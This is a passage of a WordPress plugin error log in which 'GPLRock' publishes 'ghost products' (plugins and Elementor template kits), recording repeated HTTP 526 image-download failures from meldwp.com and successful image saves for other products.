(attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:55 UTC] GPLRock: Image download failed for product secure-pattern-lock-wordpress-security-login-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/secure-pattern-lock---wordpress-security-login-plugin-20261.webp for product secure-pattern-lock-wordpress-security-login-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:46:57 UTC] GPLRock: Image download failed for product secure-pattern-lock-wordpress-security-login-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:46:59 UTC] GPLRock: Image download failed for product secure-pattern-lock-wordpress-security-login-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:47:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/secure-pattern-lock---wordpress-security-login-plugin-20261.webp for product secure-pattern-lock-wordpress-security-login-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:47:01 UTC] GPLRock WARNING: Image download failed for product secure-pattern-lock-wordpress-security-login-plugin. URL: https://meldwp.com/wp-content/uploads/secure-pattern-lock---wordpress-security-login-plugin-20261.webp [04-Apr-2026 06:47:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: secure-pattern-lock-wordpress-security-login-plugin [04-Apr-2026 06:47:02 UTC] GPLRock: Image download failed for product super-selection-form-field-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:47:04 UTC] GPLRock: Image download failed for product super-selection-form-field-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:47:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-selection-form-field-for-nex-forms-19151.webp for product super-selection-form-field-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:47:06 UTC] GPLRock: Image download failed for product super-selection-form-field-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:47:08 UTC] GPLRock: Image download failed for product super-selection-form-field-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:47:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-selection-form-field-for-nex-forms-19151.webp for product super-selection-form-field-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:47:10 UTC] GPLRock WARNING: Image download failed for product super-selection-form-field-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/super-selection-form-field-for-nex-forms-19151.webp [04-Apr-2026 06:47:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-selection-form-field-for-nex-forms [04-Apr-2026 06:47:25 UTC] GPLRock: Image downloaded successfully for product inhouse-modern-design-interior-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2fe29eaf.webp [04-Apr-2026 06:47:25 UTC] GPLRock: Using pre-downloaded image for product inhouse-modern-design-interior-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2fe29eaf.webp [04-Apr-2026 06:47:25 UTC] GPLRock: Ghost product published with image - Product ID: inhouse-modern-design-interior-elementor-template-kit [04-Apr-2026 06:47:26 UTC] GPLRock: Image downloaded successfully for product inglis-language-course-wordpress-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32230797.webp [04-Apr-2026 06:47:26 UTC] GPLRock: Using pre-downloaded image for product inglis-language-course-wordpress-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32230797.webp [04-Apr-2026 06:47:26 UTC] GPLRock: Ghost product published with image - Product ID: inglis-language-course-wordpress-elementor-template-kit [04-Apr-2026 06:47:28 UTC] GPLRock: Image downloaded successfully for product idonte-charity-non-profit-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e81c7959.webp [04-Apr-2026 06:47:28 UTC] GPLRock: Using pre-downloaded image for product idonte-charity-non-profit-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e81c7959.webp [04-Apr-2026 06:47:28 UTC] GPLRock: Ghost product published with image - Product ID: idonte-charity-non-profit-elementor-template-kit [04-Apr-2026 06:47:29 UTC] GPLRock: Image downloaded successfully for product hygienex-cleaning-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21f669fb.webp [04-Apr-2026 06:47:29 UTC] GPLRock: Using pre-downloaded image for product hygienex-cleaning-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-21f669fb.webp [04-Apr-2026 06:47:29 UTC] GPLRock: Ghost product published with image - Product ID: hygienex-cleaning-services-elementor-template-kit [04-Apr-2026 06:47:31 UTC] GPLRock: Image downloaded successfully for product hyfinance-financial-advisor-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3458ccad.webp [04-Apr-2026 06:47:31 UTC] GPLRock: Using pre-downloaded image for product hyfinance-financial-advisor-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3458ccad.webp [04-Apr-2026 06:47:31 UTC] GPLRock: Ghost product published with image - Product ID: hyfinance-financial-advisor-elementor-template-kit [04-Apr-2026 06:47:32 UTC] GPLRock: Image downloaded successfully for product hoverex-cryptocurrency-ico-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-201df4f0.webp [04-Apr-2026 06:47:33 UTC] GPLRock: Using pre-downloaded image for product hoverex-cryptocurrency-ico-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-201df4f0.webp [04-Apr-2026 06:47:33 UTC] GPLRock: Ghost product published with image - Product ID: hoverex-cryptocurrency-ico-elementor-template-kit [04-Apr-2026 06:47:34 UTC] GPLRock: Image downloaded successfully for product hosty-hosting-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b154319.webp [04-Apr-2026 06:47:34 UTC] GPLRock: Using pre-downloaded image for product hosty-hosting-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b154319.webp [04-Apr-2026 06:47:34 UTC] GPLRock: Ghost product published with image - Product ID: hosty-hosting-services-elementor-template-kit [04-Apr-2026 06:47:36 UTC] GPLRock: Image downloaded successfully for product holy-church-charity-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4181d31a.webp [04-Apr-2026 06:47:36 UTC] GPLRock: Using pre-downloaded image for product holy-church-charity-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4181d31a.webp [04-Apr-2026 06:47:36 UTC] GPLRock: Ghost product published with image - Product ID: holy-church-charity-template-kit [04-Apr-2026 06:47:37 UTC] GPLRock: Image downloaded successfully for product holadoc-online-doctor-consultation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8c8df45.jpg [04-Apr-2026 06:47:38 UTC] GPLRock: Using pre-downloaded image for product holadoc-online-doctor-consultation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8c8df45.jpg [04-Apr-2026 06:47:38 UTC] GPLRock: Ghost product published with image - Product ID: holadoc-online-doctor-consultation-elementor-template-kit [04-Apr-2026 06:47:39 UTC] GPLRock: Image downloaded successfully for product hikker-hiking-mountain-trekking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d28aee77.jpg [04-Apr-2026 06:47:39 UTC] GPLRock: Using pre-downloaded image for product hikker-hiking-mountain-trekking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d28aee77.jpg [04-Apr-2026 06:47:39 UTC] GPLRock: Ghost product published with image - Product ID: hikker-hiking-mountain-trekking-elementor-template-kit [04-Apr-2026 06:48:46 UTC] GPLRock: Image download failed for product business-christmas-greeting-card-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:48 UTC] GPLRock: Image download failed for product business-christmas-greeting-card-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/business-christmas-greeting-card---wp-plugin-17982.webp for product business-christmas-greeting-card-wp-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:48:50 UTC] GPLRock: Image download failed for product business-christmas-greeting-card-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:52 UTC] GPLRock: Image download failed for product business-christmas-greeting-card-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/business-christmas-greeting-card---wp-plugin-17982.webp for product business-christmas-greeting-card-wp-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:48:54 UTC] GPLRock WARNING: Image download failed for product business-christmas-greeting-card-wp-plugin. URL: https://meldwp.com/wp-content/uploads/business-christmas-greeting-card---wp-plugin-17982.webp [04-Apr-2026 06:48:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: business-christmas-greeting-card-wp-plugin [04-Apr-2026 06:48:54 UTC] GPLRock: Image downloaded successfully for product qwiktest-nexgen-online-exam-quiz-software (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5d88dc9.webp [04-Apr-2026 06:48:54 UTC] GPLRock: Using pre-downloaded image for product qwiktest-nexgen-online-exam-quiz-software: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5d88dc9.webp [04-Apr-2026 06:48:54 UTC] GPLRock: Ghost product published with image - Product ID: qwiktest-nexgen-online-exam-quiz-software [04-Apr-2026 06:48:54 UTC] GPLRock: Image download failed for product grocerybook-multidelivery-fees-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:56 UTC] GPLRock: Image download failed for product grocerybook-multidelivery-fees-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:48:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grocerybook-multidelivery-fees-add-on-11023.webp for product grocerybook-multidelivery-fees-add-on after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:48:59 UTC] GPLRock: Image download failed for product grocerybook-multidelivery-fees-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:01 UTC] GPLRock: Image download failed for product grocerybook-multidelivery-fees-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grocerybook-multidelivery-fees-add-on-11023.webp for product grocerybook-multidelivery-fees-add-on after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:03 UTC] GPLRock WARNING: Image download failed for product grocerybook-multidelivery-fees-add-on. URL: https://meldwp.com/wp-content/uploads/grocerybook-multidelivery-fees-add-on-11023.webp [04-Apr-2026 06:49:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grocerybook-multidelivery-fees-add-on [04-Apr-2026 06:49:03 UTC] GPLRock: Image download failed for product digital-downloads-with-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:05 UTC] GPLRock: Image download failed for product digital-downloads-with-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digital-downloads-with-arforms-5434.webp for product digital-downloads-with-arforms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:07 UTC] GPLRock: Image download failed for product digital-downloads-with-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:09 UTC] GPLRock: Image download failed for product digital-downloads-with-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digital-downloads-with-arforms-5434.webp for product digital-downloads-with-arforms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:12 UTC] GPLRock WARNING: Image download failed for product digital-downloads-with-arforms. URL: https://meldwp.com/wp-content/uploads/digital-downloads-with-arforms-5434.webp [04-Apr-2026 06:49:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digital-downloads-with-arforms [04-Apr-2026 06:49:12 UTC] GPLRock: Image download failed for product ajaxer-ajaxify-your-wordpress-site-and-comments (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:14 UTC] GPLRock: Image download failed for product ajaxer-ajaxify-your-wordpress-site-and-comments (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajaxer---ajaxify-your-wordpress-site-and-comments-31745.webp for product ajaxer-ajaxify-your-wordpress-site-and-comments after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:16 UTC] GPLRock: Image download failed for product ajaxer-ajaxify-your-wordpress-site-and-comments (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:18 UTC] GPLRock: Image download failed for product ajaxer-ajaxify-your-wordpress-site-and-comments (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ajaxer---ajaxify-your-wordpress-site-and-comments-31745.webp for product ajaxer-ajaxify-your-wordpress-site-and-comments after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:20 UTC] GPLRock WARNING: Image download failed for product ajaxer-ajaxify-your-wordpress-site-and-comments. URL: https://meldwp.com/wp-content/uploads/ajaxer---ajaxify-your-wordpress-site-and-comments-31745.webp [04-Apr-2026 06:49:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ajaxer-ajaxify-your-wordpress-site-and-comments [04-Apr-2026 06:49:20 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-wpbakery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:23 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-wpbakery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-wpbakery-31913.webp for product osteo-image-hotspot-for-wpbakery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:25 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-wpbakery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:27 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-wpbakery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-wpbakery-31913.webp for product osteo-image-hotspot-for-wpbakery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:29 UTC] GPLRock WARNING: Image download failed for product osteo-image-hotspot-for-wpbakery. URL: https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-wpbakery-31913.webp [04-Apr-2026 06:49:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osteo-image-hotspot-for-wpbakery [04-Apr-2026 06:49:29 UTC] GPLRock: Image download failed for product easy-select-and-share-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:31 UTC] GPLRock: Image download failed for product easy-select-and-share-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-select-and-share-pro-29831.webp for product easy-select-and-share-pro after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:34 UTC] GPLRock: Image download failed for product easy-select-and-share-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:36 UTC] GPLRock: Image download failed for product easy-select-and-share-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-select-and-share-pro-29831.webp for product easy-select-and-share-pro after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:38 UTC] GPLRock WARNING: Image download failed for product easy-select-and-share-pro. URL: https://meldwp.com/wp-content/uploads/easy-select-and-share-pro-29831.webp [04-Apr-2026 06:49:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easy-select-and-share-pro [04-Apr-2026 06:49:38 UTC] GPLRock: Image download failed for product payment-addon-for-userpro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:40 UTC] GPLRock: Image download failed for product payment-addon-for-userpro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payment-addon-for-userpro-23295.webp for product payment-addon-for-userpro after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:42 UTC] GPLRock: Image download failed for product payment-addon-for-userpro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:44 UTC] GPLRock: Image download failed for product payment-addon-for-userpro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payment-addon-for-userpro-23295.webp for product payment-addon-for-userpro after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:46 UTC] GPLRock WARNING: Image download failed for product payment-addon-for-userpro. URL: https://meldwp.com/wp-content/uploads/payment-addon-for-userpro-23295.webp [04-Apr-2026 06:49:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: payment-addon-for-userpro [04-Apr-2026 06:49:47 UTC] GPLRock: Image download failed for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:49 UTC] GPLRock: Image download failed for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multimedia-responsive-carousel-with-image-video-audio-support---wordpress-plugin-31851.webp for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:51 UTC] GPLRock: Image download failed for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:53 UTC] GPLRock: Image download failed for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multimedia-responsive-carousel-with-image-video-audio-support---wordpress-plugin-31851.webp for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:49:55 UTC] GPLRock WARNING: Image download failed for product multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/multimedia-responsive-carousel-with-image-video-audio-support---wordpress-plugin-31851.webp [04-Apr-2026 06:49:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multimedia-responsive-carousel-with-image-video-audio-support-wordpress-plugin [04-Apr-2026 06:49:55 UTC] GPLRock: Image download failed for product album-gallery-ultimate-wordpress-photo-gallery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:49:57 UTC] GPLRock: Image download failed for product album-gallery-ultimate-wordpress-photo-gallery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:50:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/album-gallery--ultimate-wordpress-photo-gallery-plugin-10505.webp for product album-gallery-ultimate-wordpress-photo-gallery-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:50:00 UTC] GPLRock: Image download failed for product album-gallery-ultimate-wordpress-photo-gallery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:50:02 UTC] GPLRock: Image download failed for product album-gallery-ultimate-wordpress-photo-gallery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:50:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/album-gallery--ultimate-wordpress-photo-gallery-plugin-10505.webp for product album-gallery-ultimate-wordpress-photo-gallery-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:50:04 UTC] GPLRock WARNING: Image download failed for product album-gallery-ultimate-wordpress-photo-gallery-plugin. URL: https://meldwp.com/wp-content/uploads/album-gallery--ultimate-wordpress-photo-gallery-plugin-10505.webp [04-Apr-2026 06:50:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: album-gallery-ultimate-wordpress-photo-gallery-plugin [04-Apr-2026 06:50:12 UTC] GPLRock: Image downloaded successfully for product coestra-political-party-candidate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-408f8279.jpg [04-Apr-2026 06:50:12 UTC] GPLRock: Using pre-downloaded image for product coestra-political-party-candidate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-408f8279.jpg [04-Apr-2026 06:50:12 UTC] GPLRock: Ghost product published with image - Product ID: coestra-political-party-candidate-elementor-template-kit [04-Apr-2026 06:50:14 UTC] GPLRock: Image downloaded successfully for product codesk-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82593694.webp [04-Apr-2026 06:50:14 UTC] GPLRock: Using pre-downloaded image for product codesk-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82593694.webp [04-Apr-2026 06:50:14 UTC] GPLRock: Ghost product published with image - Product ID: codesk-coworking-space-elementor-template-kit [04-Apr-2026 06:50:15 UTC] GPLRock: Image downloaded successfully for product codagraph-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-38b801f0.webp [04-Apr-2026 06:50:15 UTC] GPLRock: Using pre-downloaded image for product codagraph-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-38b801f0.webp [04-Apr-2026 06:50:15 UTC] GPLRock: Ghost product published with image - Product ID: codagraph-photography-portfolio-elementor-template-kit [04-Apr-2026 06:50:17 UTC] GPLRock: Image downloaded successfully for product coch-business-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48935f76.webp [04-Apr-2026 06:50:17 UTC] GPLRock: Using pre-downloaded image for product coch-business-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48935f76.webp [04-Apr-2026 06:50:17 UTC] GPLRock: Ghost product published with image - Product ID: coch-business-coach-elementor-template-kit [04-Apr-2026 06:50:18 UTC] GPLRock: Image downloaded successfully for product coax-agency-and-personal-about-us-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b88d6c49.webp [04-Apr-2026 06:50:18 UTC] GPLRock: Using pre-downloaded image for product coax-agency-and-personal-about-us-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b88d6c49.webp [04-Apr-2026 06:50:18 UTC] GPLRock: Ghost product published with image - Product ID: coax-agency-and-personal-about-us-elementor-template-kit [04-Apr-2026 06:50:20 UTC] GPLRock: Image downloaded successfully for product coatro-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b90224d.webp [04-Apr-2026 06:50:20 UTC] GPLRock: Using pre-downloaded image for product coatro-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b90224d.webp [04-Apr-2026 06:50:20 UTC] GPLRock: Ghost product published with image - Product ID: coatro-digital-agency-elementor-template-kit [04-Apr-2026 06:50:21 UTC] GPLRock: Image downloaded successfully for product coastal-travel-and-surf-grunge-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f816781.webp [04-Apr-2026 06:50:21 UTC] GPLRock: Using pre-downloaded image for product coastal-travel-and-surf-grunge-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f816781.webp [04-Apr-2026 06:50:21 UTC] GPLRock: Ghost product published with image - Product ID: coastal-travel-and-surf-grunge-template-kit [04-Apr-2026 06:50:22 UTC] GPLRock: Image downloaded successfully for product coachkit-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5cf222a.webp [04-Apr-2026 06:50:23 UTC] GPLRock: Using pre-downloaded image for product coachkit-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5cf222a.webp [04-Apr-2026 06:50:23 UTC] GPLRock: Ghost product published with image - Product ID: coachkit-life-coach-elementor-template-kit [04-Apr-2026 06:50:24 UTC] GPLRock: Image downloaded successfully for product coachee-coaching-program-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37e87834.webp [04-Apr-2026 06:50:24 UTC] GPLRock: Using pre-downloaded image for product coachee-coaching-program-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37e87834.webp [04-Apr-2026 06:50:24 UTC] GPLRock: Ghost product published with image - Product ID: coachee-coaching-program-elementor-template-kit [04-Apr-2026 06:50:25 UTC] GPLRock: Image downloaded successfully for product cloven-it-solutions-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bdf9a7f.webp [04-Apr-2026 06:50:25 UTC] GPLRock: Using pre-downloaded image for product cloven-it-solutions-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bdf9a7f.webp [04-Apr-2026 06:50:25 UTC] GPLRock: Ghost product published with image - Product ID: cloven-it-solutions-services-company-elementor-template-kit [04-Apr-2026 06:52:08 UTC] GPLRock: Image download failed for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:11 UTC] GPLRock: Image download failed for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrexorder---restaurant-qr-menu---whatsapp-ordering--reservation-saas-platform-22831.webp for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:13 UTC] GPLRock: Image download failed for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:15 UTC] GPLRock: Image download failed for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:52:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qrexorder---restaurant-qr-menu---whatsapp-ordering--reservation-saas-platform-22831.webp for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:52:17 UTC] GPLRock WARNING: Image download failed for product qrexorder-restaurant-qr-menu-whatsapp-ordering-reservation-saas-platform. URL: https://meldwp.com/wp-content/uploads/qrexorder---restaurant-qr-menu---whatsapp-ordering--reservation-saas-platform-22831.webp [04-Apr-2026 06:52:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 